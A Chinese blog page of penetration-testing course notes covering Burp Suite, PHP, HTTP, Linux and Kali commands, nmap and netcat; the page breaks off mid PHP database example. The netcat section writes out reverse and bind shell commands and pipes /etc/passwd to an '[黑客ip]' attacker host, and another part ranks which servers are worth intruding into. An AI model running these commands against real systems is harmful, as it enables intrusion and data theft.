<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  
  
  <title>
    渗透测试微专业 |
    
    Fzzf&#39;s blog
  </title>
  <!-- Icon -->
  
    <link rel="shortcut icon" href="/favicon.ico">
    
  
<link rel="stylesheet" href="/css/style.css">

  
  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<script src="/js/pace.min.js"></script>

<meta name="generator" content="Hexo 5.4.2"></head>

<body>
  <main class="content">
    <section class="outer">
  <article id="post-渗透测试微专业" class="article article-type-post" itemscope
  itemprop="blogPost" data-scroll-reveal>

  <div class="article-inner">
    
    <header class="article-header">
      
  
  <h1 class="article-title" itemprop="name">
    渗透测试微专业
  </h1>
  
  

    </header>
    

    
    <div class="article-meta">
      <a href="/2023/01/01/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%BE%AE%E4%B8%93%E4%B8%9A/" class="article-date">
  <time datetime="2023-01-01T13:17:33.000Z" itemprop="datePublished">2023-01-01</time>
</a>
      
    </div>
    

    
    
<div class="tocbot"></div>

    

    <div class="article-entry" itemprop="articleBody">
      
      
      
        <h1 id="渗透测试"><a href="#渗透测试" class="headerlink" title="渗透测试"></a>渗透测试</h1><p>工具网盘：<a target="_blank" rel="noopener" href="https://njeclissi.lanzoui.com/b01bfj0pc">https://njeclissi.lanzoui.com/b01bfj0pc</a>      密码:****</p>
<span id="more"></span>
<h2 id="抓包"><a href="#抓包" class="headerlink" title="抓包"></a>抓包</h2><p>jre—java环境</p>
<p>如何证明安装成功：cmd-&gt;java有东西</p>
<p>burpsuite 神器</p>
<p>如果打不开，创建一个bat</p>
<p>java -jar BurpUnlimited.jar</p>
<p>proxy  代理      spider 爬虫（蜘蛛） </p>
<p>intruder（暴力破解）repeater(模拟提交)</p>
<hr>
<p>火狐+burp没办法上https网站</p>
<p>火狐输入  <a target="_blank" rel="noopener" href="http://burp/">http://burp/</a>    下载证书</p>
<p>工具-选项-高级-证书-查看证书-证书机构-导入</p>
<hr>
<p>网络传输的东西         <strong>010101011101—&gt;hex(十六进制)—&gt;人类可读</strong></p>
<hr>
<p>在抓包的时候：</p>
<p>referer来路</p>
<hr>
<h2 id="php入门"><a href="#php入门" class="headerlink" title="php入门"></a>php入门</h2><p>index.xxx</p>
<p>index.html index.php .jsp .asp .htm</p>
<p>index是标准的网页首页命名</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;hahanihao&quot;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>php代码必须使用</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>包裹起来</p>
<p>echo 输出</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$a</span> = <span class="number">123</span>;</span><br><span class="line"><span class="variable">$b</span> = <span class="number">999</span>;</span><br><span class="line"><span class="variable">$c</span> = <span class="variable">$a</span> + <span class="variable">$b</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$c</span>;</span><br></pre></td></tr></table></figure>

<hr>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">这个是多行注释</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span> = <span class="string">&quot;haha&quot;</span>;</span><br><span class="line"><span class="variable">$b</span> = <span class="string">&quot;nihao&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$c</span> = <span class="variable">$a</span>.<span class="variable">$b</span>;   <span class="comment">//这里的点叫粘合</span></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$c</span>;</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="GET请求和POST请求"><a href="#GET请求和POST请求" class="headerlink" title="GET请求和POST请求"></a>GET请求和POST请求</h2><p>GET:GET多用在取东西</p>
<p>​        通过地址栏从服务器拿东西 刷新和跳转没区别</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$a</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;name&#x27;</span>];  <span class="comment">//?name=xiaoming&amp;age=20</span></span><br><span class="line"><span class="variable">$b</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;age&#x27;</span>];   <span class="comment">//输入name和age   参数之间用&amp;粘合</span></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$a</span>.<span class="string">&quot;----&quot;</span>.<span class="variable">$b</span>;   <span class="comment">// 参数输入不分先后</span></span><br></pre></td></tr></table></figure>

<hr>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$a</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line"><span class="variable">$b</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;age&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$b</span>&gt;<span class="number">18</span>)</span><br><span class="line">&#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;chengnian&#x27;</span>.<span class="variable">$a</span>;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;wei cheng nian&#x27;</span>.<span class="variable">$a</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<hr>
<p>POST:POST多用在用户名密码注册，登录…</p>
<p>提交一个表单（送给服务器东西）</p>
<p>按下回车键（点击提交），会以GET方式读取一下当前地址  </p>
<p>刷新会再次提交数据到当前页面</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$a</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;name&#x27;</span>];                               </span><br></pre></td></tr></table></figure>

<p>刷新：</p>
<p>从浏览器取网页的新内容来更新本地缓存，更新的同时保留一些本地变量</p>
<p>跳转：</p>
<p>在地址栏输入新的地址，不会更新本地的缓存和变量</p>
<hr>
<p>www</p>
<p>world wide web 万维网</p>
<p>由web客户端，服务器组成</p>
<p>web客户端</p>
<p>浏览器web browser</p>
<p>浏览器</p>
<p>可以访问网页服务器的web系统，查看html文件</p>
<p>IE edge chrome firefox opera safari</p>
<hr>
<p>request:</p>
<p>向服务器发送一个请求，服务器会返回一个结果给客户端</p>
<p>forward:</p>
<p>服务器内部发生重定向</p>
<p>redirect:</p>
<p>服务器收到请求后发送一个状态给客户，客户会再次请求，此时url发生了改变</p>
<p>url:</p>
<p>统一资源定位器</p>
<p><a target="_blank" rel="noopener" href="http://www.baidu.com/index.php">http://www.baidu.com/index.php</a></p>
<p>协议     域名        文件</p>
<p><a target="_blank" rel="noopener" href="https://www.baidu.com/s?ie=utf-8&amp;f=8&amp;rsv_bp=1&amp;rsv_idx=1&amp;tn=baidu&amp;wd=12306">https://www.baidu.com/s?ie=utf-8&amp;f=8&amp;rsv_bp=1&amp;rsv_idx=1&amp;tn=baidu&amp;wd=12306</a></p>
<p>s = 文件</p>
<p>? = get请求</p>
<p>ie = 参数名</p>
<p>utf-8 = 参数值</p>
<p>&amp; = 连接符</p>
<hr>
<p>http超文本传输协议</p>
<p>所有的www文件都支持这个标准</p>
<p>http是基于TCP/IP传输的</p>
<hr>
<h2 id="TCP-IP-三次握手："><a href="#TCP-IP-三次握手：" class="headerlink" title="TCP/IP 三次握手："></a>TCP/IP 三次握手：</h2><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_40277163/article/details/124930092"> 【TCP/IP】三次握手过程及原因_</a></p>
<p>第一步，Client会进入SYN_SENT状态，并发送Syn 消息给Server端，SYN标志位在此场景下被设置为1，同时会带上Client这端分配好的Seq号，这个序列号是一个U32的整型数，该数值的分配是根据时间产生的一个随机值，通常情况下每间隔4ms会加1。除此之外还会带一个MSS，也就是最大报文段长度，表示Tcp传往另一端的最大数据块的长度。</p>
<p>第二步，Server端在收到，Syn消息之后，会进入SYN_RCVD状态，同时返回Ack消息给Client，用来通知Client，Server端已经收到SYN消息并通过了确认。这一步Server端包含两部分内容，一部分是回复Client的Syn消息，其中ACK=1，Seq号设置为Client的Syn消息的Seq数值+1；另一部分是主动发送Sever端的Syn消息给Client，Seq号码是Server端上面对应的序列号，当然Syn标志位也会设置成1，MSS表示的是Server这一端的最大数据块长度。</p>
<p>第三步，Client在收到第二步消息之后，首先会将Client端的状态从SYN_SENT变换成ESTABLISHED,此时Client发消息给Server端，这个方向的通道已经建立成功，Client可以发送消息给Server端了，Server端也可以成功收到这些消息。其次，Client端需要回复ACK消息给Server端，消息包含ACK状态被设置为1，Seq号码被设置成Server端的序列号+1。（备注：这一步往往会与Client主动发起的数据消息，合并到一起发送给Server端。）</p>
<p>第四步，Server端在收到这个Ack消息之后，会进入ESTABLISHED状态，到此时刻Server发向Client的通道连接建立成功，Server可以发送数据给Client，TCP的全双工连接建立完成。</p>
<hr>
<h2 id="web服务器-中间件"><a href="#web服务器-中间件" class="headerlink" title="web服务器(中间件)"></a>web服务器(中间件)</h2><p>apache iis nginx tomcat</p>
<p>web服务器接收到一个请求，会向客户发送相应消息</p>
<p>1.http是无连接的！！！限制每一次的连接请求，每一次一个请求，服务器收到请求之后完成应答，断开连接，节省传输时间</p>
<p>2.http是媒体独立的：只要客户端，服务器都知道这个数据是干嘛用的，就可以使用http传输</p>
<p>3.http是无状态的：无状态就是没有记忆能力，如果中途中断了，就需要重传</p>
<hr>
<h2 id="http状态码"><a href="#http状态码" class="headerlink" title="http状态码"></a>http状态码</h2><p>200 成功</p>
<p>301 网页被永久转向了其他的url</p>
<p>404 请求的资源不存在</p>
<p>500 服务器内部错误</p>
<hr>
<h2 id="响应头类型"><a href="#响应头类型" class="headerlink" title="响应头类型"></a>响应头类型</h2><p>Content-Type = 文档类型</p>
<p>Content-Length = 传过来的内容长度</p>
<p>Expires = 什么时候文档过期，不再缓存它</p>
<p>Last-Modified = 最后修改时间</p>
<p>refresh = 浏览器多长时间后刷新该文档</p>
<p>server = 服务器名字</p>
<p>set-cookie = 是否需要cookie支持</p>
<hr>
<h2 id="charles使用"><a href="#charles使用" class="headerlink" title="charles使用"></a>charles使用</h2><p>http代理           拦截http请求的代理</p>
<p>socks代理        拦截socks请求</p>
<hr>
<h2 id="操作系统"><a href="#操作系统" class="headerlink" title="操作系统"></a>操作系统</h2><p>unix   开源，最安全</p>
<p>Linux–android</p>
<p>dos</p>
<p>windows      (闭源)</p>
<p>macOS–iOS（闭源）</p>
<hr>
<p>闭源：黑盒测试(推断程序员会在哪个地方偷懒)</p>
<p>开源：白盒测试（代码审计）</p>
<hr>
<h2 id="vps网站搭建"><a href="#vps网站搭建" class="headerlink" title="vps网站搭建"></a>vps网站搭建</h2><p>虚拟化，云计算</p>
<p>最开始的时候，一台服务器推荐只安装一个角色(service)</p>
<p>租vps</p>
<p>分配给你一个ip地址</p>
<p>连接这台服务器</p>
<p>windows 远程桌面连接(用户名administrator)</p>
<p>linux ssh连接（用户名root）</p>
<p>安装一个网站管理系统   宝塔面板 bt.cn</p>
<h2 id="vps-线路"><a href="#vps-线路" class="headerlink" title="vps 线路"></a>vps 线路</h2><p>CN2中国下一代承载网，支持qos，比传统的163线路强</p>
<p>CN2GT便宜，拥堵</p>
<p>CN2GIA贵，质量好</p>
<p>BGP多线机房，自动识别运营商，不同网络自动切换</p>
<p>GCP谷歌公司的线路，贵，质量超级好</p>
<p>AWS亚马逊线路，流量太少</p>
<p>Azure微软线路，慢，中规中矩</p>
<p>PCCW香港线路，贵，网络发达</p>
<p>IPLC国际私有租用线路(专线)，极贵，带宽小流量低，不用翻墙直接墙外，不会通过GFW审查</p>
<hr>
<h2 id="CDN"><a href="#CDN" class="headerlink" title="CDN"></a>CDN</h2><p>一种缓存服务器          防御ip地址本尊被发现        cloudflare免费cdn</p>
<h2 id="个人信息泄露"><a href="#个人信息泄露" class="headerlink" title="个人信息泄露"></a>个人信息泄露</h2><p>网络方面：大部分的人都会暴露自己的公网ip</p>
<p>暴露ip就会暴露通信内容</p>
<p>加密（vpn）</p>
<h2 id="个人软件"><a href="#个人软件" class="headerlink" title="个人软件"></a>个人软件</h2><p>IM</p>
<p>qq wx</p>
<p>某些电脑会自动上传你点你的文件到服务器分析</p>
<p>某些杀毒软件：可以名正言顺的对你电脑进行扫描，搜集信息</p>
<p>某些国产浏览器</p>
<p>（chromium chrome firefox safari opera）</p>
<p>记得退出的时候清理痕迹</p>
<p>输入法</p>
<p>个人电脑方面：</p>
<p>盗版操作系统（msdn我告诉你）</p>
<p>邮件的客户端 outlook exchange foxmail…..</p>
<p>下载的东西（多用虚拟机）</p>
<p>网络通信：</p>
<p>SMS—&gt;2G=不加密（3-5G加密）</p>
<p>伪基站</p>
<p>免费wifi</p>
<h2 id="硬盘的存储原理"><a href="#硬盘的存储原理" class="headerlink" title="硬盘的存储原理"></a>硬盘的存储原理</h2><p>覆盖才是真正的忘记</p>
<p>机械硬盘理论上覆盖3次才能彻底忘记</p>
<p>固态硬盘直接覆盖就没了</p>
<hr>
<h2 id="kali-linux"><a href="#kali-linux" class="headerlink" title="kali(linux)"></a>kali(linux)</h2><p><a target="_blank" rel="noopener" href="http://kali.org/">kali.org</a> download —&gt;下载kali的iso文件</p>
<p>ultraiso刻到u盘里</p>
<p>live模式（数据都在内存里）</p>
<p>install模式</p>
<hr>
<p>kali2020  默认用户名和密码kali</p>
<p>2019  root toor</p>
<hr>
<p>普通用户权限 $</p>
<p>最高权限（root）用户 #</p>
<hr>
<p><strong>sudo su</strong> 提权命令</p>
<p><strong>passwd</strong> 修改当前用户密码</p>
<hr>
<p>windows世界</p>
<p>administrator</p>
<p>system</p>
<hr>
<p>linux世界</p>
<p>root</p>
<p>ifconfig 查看ip地址</p>
<p>whoami 查看自己是谁</p>
<p>pwd 查看当所在的目录</p>
<p>ls 查看当前目录所有文件和pwd文件夹</p>
<p>ls -la 查看详细信息</p>
<p>touch [文件名] 新建文件</p>
<p>nano [文本文件] 编辑文件</p>
<p>cat 1.txt 查看内容</p>
<p>vi [文本文件] 使用vi去编辑文件</p>
<p>I 写入模式</p>
<p>：wq 保存并退出  ：q! 退出不保存</p>
<p>d r-x r-x r-x 13 root root 0 Nov 3 11:22 sys</p>
<p>​     A    B   C         D       E</p>
<p>d 文件夹  A=所有者权限        D=文件的所有人</p>
<p>- 文件    B=所有者所在组的权限   E=所有人所在组</p>
<p>l 链接    C =其他人权限</p>
<p>r=read=4 w=write=2 x=execute=1</p>
<p>chmod [权限编号] [目标文件] 修改文件权限</p>
<p>chmod 755 -R [文件夹] 把文件夹和文件夹所有东西都赋值为755</p>
<p>cp [被复制的人] [复制的位置] 复制文件</p>
<p>mv [被<strong>剪切</strong>的人] [目标位置] 剪切文件</p>
<p>rm [目标] 删除</p>
<p>rm -rf [目标] 全部删除</p>
<p>(rm -rf /* 危险命令！！)</p>
<p>find [要在哪个地方查找] -name [查找的文件名] 找东西</p>
<p><strong>find /home -name 1.txt</strong></p>
<p>ps 查看进程</p>
<p>ps -ef 查看所有进程</p>
<p>ps -ef | grep lib 查看进程名字包含lib关键词的进程</p>
<p>top 查看进程（动态）</p>
<p>ctrl+c结束</p>
<p>echo 回显</p>
<p>echo haha &gt; 1.txt 在1.txt里写入haha（<strong>覆盖</strong>）</p>
<p>echo haha <strong>&gt;&gt;</strong> 1.txt <strong>追加</strong></p>
<p>uname 查看操作系统</p>
<p>uname -a 查看详细版本号</p>
<p>防火墙</p>
<p>service iptables start/stop</p>
<p>chkconfig iptables on/off ———&gt;kali</p>
<hr>
<p>linux下载东西在哪里下载</p>
<p>/etc/apt/source/list</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib </span><br><span class="line"></span><br><span class="line">deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get update</span><br></pre></td></tr></table></figure>

<p> 更新</p>
<h2 id="beef安装"><a href="#beef安装" class="headerlink" title="beef安装"></a>beef安装</h2><p>apt-get install beef-xss</p>
<p>安装beef-xss的东西</p>
<p>beef按下tab键补全</p>
<h2 id="netcat"><a href="#netcat" class="headerlink" title="netcat"></a>netcat</h2><p>服务端：</p>
<p>nc -l -p 4444</p>
<p>客户端：</p>
<p>nc -nv [服务端ip] 4444</p>
<hr>
<p><strong>远程控制</strong></p>
<p>正向控制：</p>
<p>目标：</p>
<p>nc -lp 3333 -e cmd</p>
<p>黑客：</p>
<p>nc -nv [目标ip] 3333</p>
<p>反向控制：</p>
<p>黑客：</p>
<p>nc -lp 3333</p>
<p>目标：</p>
<p>nc -nv [黑客ip] 3333 -e cmd</p>
<p>(如果目标是linux -c bash)</p>
<p>nc -nvz [目标ip] 1-65535</p>
<p>使用nc查看对方端口是否开放</p>
<p>linux加密传输</p>
<p>目标：</p>
<p>cat /etc/passwd | base64 | nc -nv [黑客ip] 3333 -q 1</p>
<p>黑客：</p>
<p>nc -l -p 3333 &gt; kali.txt</p>
<hr>
<p>传输文件</p>
<p>目标：</p>
<p>nc -nv [黑客ip] 3333 &lt;./[要传的文件] </p>
<p>黑客：</p>
<p>nc -lp 3333 &gt; xx.txt</p>
<hr>
<p>两台都是Linux的情况</p>
<p>目标:</p>
<p>whois -h [黑客ip] -p 4444 <code>cat /etc/passwd | base64</code></p>
<p>黑客：</p>
<p>nc -l -v -p 4444 | sed “s/ //g” | base64 -d</p>
<hr>
<p>两台都是linux，并且要加密通信</p>
<p>nc的加密版ncat</p>
<p>目标：</p>
<p>ncat -c bash –allow [黑客ip] -vnl 3333 –ssl 只允许黑客的ip去控制它</p>
<p>黑客：</p>
<p>nc -nv [目标ip] 3333 –ssl</p>
<hr>
<h2 id="nmap全世界最厉害的扫描器"><a href="#nmap全世界最厉害的扫描器" class="headerlink" title="nmap全世界最厉害的扫描器"></a>nmap全世界最厉害的扫描器</h2><p>主机发现</p>
<p>端口扫描</p>
<p>版本检测</p>
<p>操作系统等指纹识别</p>
<p>nmap [目标ip] 普通扫描</p>
<p>-sT tcp扫描</p>
<p>-sS 隐秘扫描（不形成三次握手），所以不建立tcp连接，所以不会在防火墙留下痕迹</p>
<p>-sL [扫描一个ip段] 主要用于批量主机发现</p>
<p>-sn ping扫描，只发现主机不扫描端口</p>
<p>-Pn 将所有主机假定为开机，跳过主机发现的过程</p>
<p>-P0 使用ip协议探测主机是否开启</p>
<p>-sU 使用UDP扫描</p>
<p>-p 指定扫描哪些端口 nmap -p 80,443,3389 192.168.1.0/24</p>
<p>-O 识别操作系统</p>
<hr>
<h2 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h2><p>本地信息搜集：</p>
<p>whoami 查看自己身份</p>
<p>域用户</p>
<p>AD（管理全部人）</p>
<p>whoami /all 获取当前域的信息</p>
<p>ipconfig 获取ip地址信息</p>
<p>ipconfig /all 获取详细的ip地址信息</p>
<p>arp -a 查看arp表</p>
<p>systeminfo 查看操作系统的信息</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> %PROCESSOR_ARCHITECTURE%</span><br></pre></td></tr></table></figure>

<p>wmic product 查看安装了什么软件</p>
<p>wmic product get name,version 查看安装的软件和版本信息</p>
<p>net user查看本地用户</p>
<p>net session 显示本地和远程的会话</p>
<p>net view 查看内网的共享</p>
<p>net share 查看自己共享了什么东西</p>
<p>net share c$ /del</p>
<h2 id="远程信息搜集："><a href="#远程信息搜集：" class="headerlink" title="远程信息搜集："></a>远程信息搜集：</h2><p>什么样的服务器有入侵价值？</p>
<p>1.上面有有价值的网站</p>
<p><a target="_blank" rel="noopener" href="http://seo.chinaz.com/">seo.chinaz.com</a> 查看seo信息</p>
<p>权重，ip访问量（cpv,cpa,cps）</p>
<p>2.上面有庞大数据库的服务器</p>
<p>mssql mysql oracle redis…..</p>
<p>3.性能优秀的服务器</p>
<p>高性能的cpu，显卡，硬盘</p>
<p>4.保有某些单位机密的服务器</p>
<h2 id="nping"><a href="#nping" class="headerlink" title="nping"></a>nping</h2><p>nping –tcp -p 80 –flag syn 2 [目标ip] </p>
<p>nping –tcp -p 443 –flags SYN 192.168.31.26   </p>
<p>测试对方的端口是否开放</p>
<p>netdiscover -i eth0 -r 192.168.1.0/24</p>
<p>搜集内网用户的信息</p>
<p>arping [参数] [目标]</p>
<p>-i 指定网卡</p>
<p>-c 发包的数量</p>
<p>-s 源mac</p>
<p>-S 源ip</p>
<p>arping -i eth0 [目标ip]</p>
<p>使用arp扫描</p>
<p>nbtscan</p>
<p>使用<strong>netbios</strong>协议进行信息搜集</p>
<p>netbios协议就是计算机名—–ip对应地址的解析协议</p>
<p>whatweb <a target="_blank" rel="noopener" href="http://192.168.1.150/">http://192.168.1.150</a>（内网）</p>
<p>初步分析网站的结构</p>
<hr>
<h2 id="EFS文件加密"><a href="#EFS文件加密" class="headerlink" title="EFS文件加密"></a>EFS文件加密</h2><p>只能windows使用</p>
<p><strong>certmgr.msc</strong></p>
<p>证书加密（非常非常安全，记得导出私钥!!!!!!）</p>
<p>你的磁盘必须为NTFS格式才可以使用EFS加密</p>
<hr>
<h2 id="php编程"><a href="#php编程" class="headerlink" title="php编程"></a>php编程</h2><p>c c++ java</p>
<p>php做web开发（html css javascript）</p>
<p>python</p>
<p>nodejs</p>
<hr>
<p>phpstudy，apache+mysql开启</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$servername</span> = <span class="string">&quot;localhost&quot;</span>;</span><br><span class="line"><span class="variable">$username</span> = <span class="string">&quot;root&quot;</span>;</span><br><span class="line"><span class="variable">$password</span> = <span class="string">&quot;root&quot;</span>;</span><br><span class="line"><span class="variable">$dbname</span> = <span class="string">&quot;haha&quot;</span>;<span class="comment">//数据库库名</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//创建连接</span></span><br><span class="line"><span class="variable">$conn</span> = <span class="keyword">new</span> <span class="title function_ invoke__">mysqli</span>(<span class="variable">$servername</span>,<span class="variable">$username</span>,<span class="variable">$password</span>,<span class="variable">$dbname</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">//检测链接</span></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$conn</span>-&gt;connect_error)&#123;</span><br><span class="line">  <span class="keyword">die</span>(<span class="string">&quot;连接失败&quot;</span>.<span class="variable">$conn</span>-&gt;connect_error);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//数据库查语句</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//准备一条数据库语句</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;SELECT * FROM table1 WHERE id &lt; 3&quot;</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">//执行sql语句并且返回给变量</span></span><br><span class="line"><span class="variable">$result</span> = <span class="variable">$conn</span>-&gt;<span class="title function_ invoke__">query</span>(<span class="variable">$sql</span>);</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"></span><br><span class="line"><span class="comment">//判断$result里是否有东西</span></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$result</span>-&gt;num_rows&gt;<span class="number">0</span>)&#123;</span><br><span class="line"></span><br><span class="line">  <span class="comment">//输出数据</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">while</span>(<span class="variable">$row</span> = <span class="variable">$result</span>-&gt;<span class="title function_ invoke__">fetch_assoc</span>())&#123;</span><br><span class="line"></span><br><span class="line">​    <span class="keyword">echo</span> <span class="variable">$row</span>[<span class="string">&#x27;id&#x27;</span>].<span class="string">&#x27;-----&#x27;</span>.<span class="variable">$row</span>[<span class="string">&#x27;username&#x27;</span>].<span class="string">&#x27;------&#x27;</span>.<span class="variable">$row</span>[<span class="string">&#x27;job&#x27;</span>].<span class="string">&#x27;&lt;br/&gt;&#x27;</span>;</span><br><span class="line"></span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;0结果&quot;</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">//数据库增语句</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;INSERT INTO table1 (username,password,job) VALUES(&#x27;user5&#x27;,&#x27;mima55&#x27;,&#x27;cfo&#x27;)&quot;</span>;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$conn</span>-&gt;<span class="title function_ invoke__">query</span>(<span class="variable">$sql</span>)===<span class="literal">TRUE</span>)&#123;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;新记录插入成功&quot;</span>;</span><br><span class="line"></span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;插入失败&quot;</span>.<span class="variable">$conn</span>-&gt;error;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//数据库修改语句</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;UPDATE table1 SET password=&#x27;mima598&#x27; WHERE username=&#x27;user5&#x27;&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$conn</span>-&gt;<span class="title function_ invoke__">query</span>(<span class="variable">$sql</span>)===<span class="literal">TRUE</span>)&#123;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;修改成功&quot;</span>;</span><br><span class="line"></span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;修改失败&quot;</span>.<span class="variable">$conn</span>-&gt;error;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//数据库删除语句</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;DELETE FROM table1 WHERE username=&#x27;user5&#x27;&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$conn</span>-&gt;<span class="title function_ 